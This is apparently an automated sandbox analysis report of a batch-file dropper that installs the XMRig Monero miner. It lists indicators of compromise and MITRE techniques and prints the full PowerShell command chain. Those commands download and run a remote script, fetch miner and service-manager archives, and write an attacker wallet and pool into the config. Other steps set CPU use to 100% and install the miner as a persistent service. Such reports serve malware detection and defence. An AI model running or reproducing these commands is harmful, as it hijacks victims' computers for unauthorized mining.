xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
1050s
max time network
1024s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
30/06/2024, 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23850273031944.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac4d-132.dat	family_xmrig
behavioral1/files/0x000700000001ac4d-132.dat	xmrig
behavioral1/memory/1120-135-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-426-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-427-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-434-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-435-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-436-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-437-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-438-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-439-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-440-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-441-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-442-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-443-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-444-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-445-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-446-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-447-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-448-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-449-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-450-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-451-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-452-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-453-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-454-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-455-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-456-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-457-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-458-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-460-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-461-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-462-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-477-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-478-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-479-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-480-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-481-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-482-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-483-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-484-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-485-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2596-486-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	96	powershell.exe
5	5100	powershell.exe
7	512	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1120	xmrig.exe
4012	nssm.exe
920	nssm.exe
656	nssm.exe
2200	nssm.exe
2568	nssm.exe
4988	nssm.exe
4692	nssm.exe
2596	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2596	sc.exe
220	sc.exe
2052	sc.exe
2652	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4668	powershell.exe
3400	powershell.exe
2668	powershell.exe
1224	powershell.exe
512	powershell.exe
96	powershell.exe
168	powershell.exe
4144	powershell.exe
4576	powershell.exe
5100	powershell.exe
3056	powershell.exe
5068	powershell.exe
1228	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4880	timeout.exe
1804	timeout.exe
2216	timeout.exe
5036	timeout.exe
8	Process not Found
2664	Process not Found
4184	timeout.exe
2244	timeout.exe
4352	Process not Found
3888	Process not Found
4732	Process not Found
4052	timeout.exe
4136	timeout.exe
316	timeout.exe
212	timeout.exe
3900	timeout.exe
1296	Process not Found
2884	timeout.exe
4164	timeout.exe
3984	Process not Found
1260	Process not Found
4928	Process not Found
4880	timeout.exe
4516	timeout.exe
4648	timeout.exe
4808	timeout.exe
2228	timeout.exe
4472	Process not Found
4304	timeout.exe
5036	timeout.exe
3116	timeout.exe
3548	timeout.exe
4504	Process not Found
4364	timeout.exe
1528	timeout.exe
516	timeout.exe
4016	timeout.exe
4624	timeout.exe
2076	Process not Found
3404	Process not Found
4552	timeout.exe
1188	timeout.exe
4428	timeout.exe
4408	timeout.exe
1860	timeout.exe
3064	Process not Found
4448	timeout.exe
2236	timeout.exe
1612	timeout.exe
1768	Process not Found
4128	Process not Found
3568	Process not Found
4464	timeout.exe
972	timeout.exe
3836	Process not Found
1000	Process not Found
60	Process not Found
3380	timeout.exe
3116	timeout.exe
1400	timeout.exe
4424	Process not Found
2440	Process not Found
2248	Process not Found
4412	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4156	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
96	powershell.exe
96	powershell.exe
96	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
1228	powershell.exe
1228	powershell.exe
1228	powershell.exe
3400	powershell.exe
3400	powershell.exe
3400	powershell.exe
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe
168	powershell.exe
168	powershell.exe
168	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
4576	powershell.exe
4576	powershell.exe
4576	powershell.exe
1224	powershell.exe
1224	powershell.exe
1224	powershell.exe
512	powershell.exe
512	powershell.exe
512	powershell.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	96	powershell.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	3400	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	168	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeLockMemoryPrivilege	2596	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4688	WMIC.exe
Token: SeSecurityPrivilege	4688	WMIC.exe
Token: SeTakeOwnershipPrivilege	4688	WMIC.exe
Token: SeLoadDriverPrivilege	4688	WMIC.exe
Token: SeSystemProfilePrivilege	4688	WMIC.exe
Token: SeSystemtimePrivilege	4688	WMIC.exe
Token: SeProfSingleProcessPrivilege	4688	WMIC.exe
Token: SeIncBasePriorityPrivilege	4688	WMIC.exe
Token: SeCreatePagefilePrivilege	4688	WMIC.exe
Token: SeBackupPrivilege	4688	WMIC.exe
Token: SeRestorePrivilege	4688	WMIC.exe
Token: SeShutdownPrivilege	4688	WMIC.exe
Token: SeDebugPrivilege	4688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4688	WMIC.exe
Token: SeRemoteShutdownPrivilege	4688	WMIC.exe
Token: SeUndockPrivilege	4688	WMIC.exe
Token: SeManageVolumePrivilege	4688	WMIC.exe
Token: 33	4688	WMIC.exe
Token: 34	4688	WMIC.exe
Token: 35	4688	WMIC.exe
Token: 36	4688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4688	WMIC.exe
Token: SeSecurityPrivilege	4688	WMIC.exe
Token: SeTakeOwnershipPrivilege	4688	WMIC.exe
Token: SeLoadDriverPrivilege	4688	WMIC.exe
Token: SeSystemProfilePrivilege	4688	WMIC.exe
Token: SeSystemtimePrivilege	4688	WMIC.exe
Token: SeProfSingleProcessPrivilege	4688	WMIC.exe
Token: SeIncBasePriorityPrivilege	4688	WMIC.exe
Token: SeCreatePagefilePrivilege	4688	WMIC.exe
Token: SeBackupPrivilege	4688	WMIC.exe
Token: SeRestorePrivilege	4688	WMIC.exe
Token: SeShutdownPrivilege	4688	WMIC.exe
Token: SeDebugPrivilege	4688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4688	WMIC.exe
Token: SeRemoteShutdownPrivilege	4688	WMIC.exe
Token: SeUndockPrivilege	4688	WMIC.exe
Token: SeManageVolumePrivilege	4688	WMIC.exe
Token: 33	4688	WMIC.exe
Token: 34	4688	WMIC.exe
Token: 35	4688	WMIC.exe
Token: 36	4688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2244	WMIC.exe
Token: SeSecurityPrivilege	2244	WMIC.exe
Token: SeTakeOwnershipPrivilege	2244	WMIC.exe
Token: SeLoadDriverPrivilege	2244	WMIC.exe
Token: SeSystemProfilePrivilege	2244	WMIC.exe
Token: SeSystemtimePrivilege	2244	WMIC.exe
Token: SeProfSingleProcessPrivilege	2244	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2596	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5084 wrote to memory of 96	5084	cmd.exe	74
PID 5084 wrote to memory of 96	5084	cmd.exe	74
PID 96 wrote to memory of 4616	96	powershell.exe	75
PID 96 wrote to memory of 4616	96	powershell.exe	75
PID 4616 wrote to memory of 3660	4616	cmd.exe	76
PID 4616 wrote to memory of 3660	4616	cmd.exe	76
PID 3660 wrote to memory of 1012	3660	net.exe	77
PID 3660 wrote to memory of 1012	3660	net.exe	77
PID 4616 wrote to memory of 2588	4616	cmd.exe	78
PID 4616 wrote to memory of 2588	4616	cmd.exe	78
PID 4616 wrote to memory of 2752	4616	cmd.exe	79
PID 4616 wrote to memory of 2752	4616	cmd.exe	79
PID 4616 wrote to memory of 4724	4616	cmd.exe	80
PID 4616 wrote to memory of 4724	4616	cmd.exe	80
PID 4616 wrote to memory of 2964	4616	cmd.exe	81
PID 4616 wrote to memory of 2964	4616	cmd.exe	81
PID 4616 wrote to memory of 1684	4616	cmd.exe	82
PID 4616 wrote to memory of 1684	4616	cmd.exe	82
PID 4616 wrote to memory of 2652	4616	cmd.exe	83
PID 4616 wrote to memory of 2652	4616	cmd.exe	83
PID 4616 wrote to memory of 2596	4616	cmd.exe	84
PID 4616 wrote to memory of 2596	4616	cmd.exe	84
PID 4616 wrote to memory of 4156	4616	cmd.exe	85
PID 4616 wrote to memory of 4156	4616	cmd.exe	85
PID 4616 wrote to memory of 5100	4616	cmd.exe	87
PID 4616 wrote to memory of 5100	4616	cmd.exe	87
PID 4616 wrote to memory of 4668	4616	cmd.exe	88
PID 4616 wrote to memory of 4668	4616	cmd.exe	88
PID 4616 wrote to memory of 1228	4616	cmd.exe	89
PID 4616 wrote to memory of 1228	4616	cmd.exe	89
PID 4616 wrote to memory of 1120	4616	cmd.exe	90
PID 4616 wrote to memory of 1120	4616	cmd.exe	90
PID 4616 wrote to memory of 652	4616	cmd.exe	91
PID 4616 wrote to memory of 652	4616	cmd.exe	91
PID 652 wrote to memory of 3400	652	cmd.exe	92
PID 652 wrote to memory of 3400	652	cmd.exe	92
PID 3400 wrote to memory of 4744	3400	powershell.exe	93
PID 3400 wrote to memory of 4744	3400	powershell.exe	93
PID 4616 wrote to memory of 2668	4616	cmd.exe	94
PID 4616 wrote to memory of 2668	4616	cmd.exe	94
PID 4616 wrote to memory of 168	4616	cmd.exe	95
PID 4616 wrote to memory of 168	4616	cmd.exe	95
PID 4616 wrote to memory of 3056	4616	cmd.exe	96
PID 4616 wrote to memory of 3056	4616	cmd.exe	96
PID 4616 wrote to memory of 4144	4616	cmd.exe	97
PID 4616 wrote to memory of 4144	4616	cmd.exe	97
PID 4616 wrote to memory of 4576	4616	cmd.exe	98
PID 4616 wrote to memory of 4576	4616	cmd.exe	98
PID 4616 wrote to memory of 1224	4616	cmd.exe	99
PID 4616 wrote to memory of 1224	4616	cmd.exe	99
PID 4616 wrote to memory of 512	4616	cmd.exe	100
PID 4616 wrote to memory of 512	4616	cmd.exe	100
PID 4616 wrote to memory of 5068	4616	cmd.exe	101
PID 4616 wrote to memory of 5068	4616	cmd.exe	101
PID 4616 wrote to memory of 220	4616	cmd.exe	102
PID 4616 wrote to memory of 220	4616	cmd.exe	102
PID 4616 wrote to memory of 2052	4616	cmd.exe	103
PID 4616 wrote to memory of 2052	4616	cmd.exe	103
PID 4616 wrote to memory of 4012	4616	cmd.exe	104
PID 4616 wrote to memory of 4012	4616	cmd.exe	104
PID 4616 wrote to memory of 920	4616	cmd.exe	105
PID 4616 wrote to memory of 920	4616	cmd.exe	105
PID 4616 wrote to memory of 656	4616	cmd.exe	106
PID 4616 wrote to memory of 656	4616	cmd.exe	106

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\23850273031944.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:96
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp707D.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:1012
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:2588
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:2752
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4724
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:2964
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:1684
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2652
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2596
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1228
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:1120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3400
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:4744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Fcxhtlhl\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5068
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:220
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2052
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:4012
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:920
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:656
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:2200
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2568
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3168
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1224
- C:\Windows\system32\cmd.exe
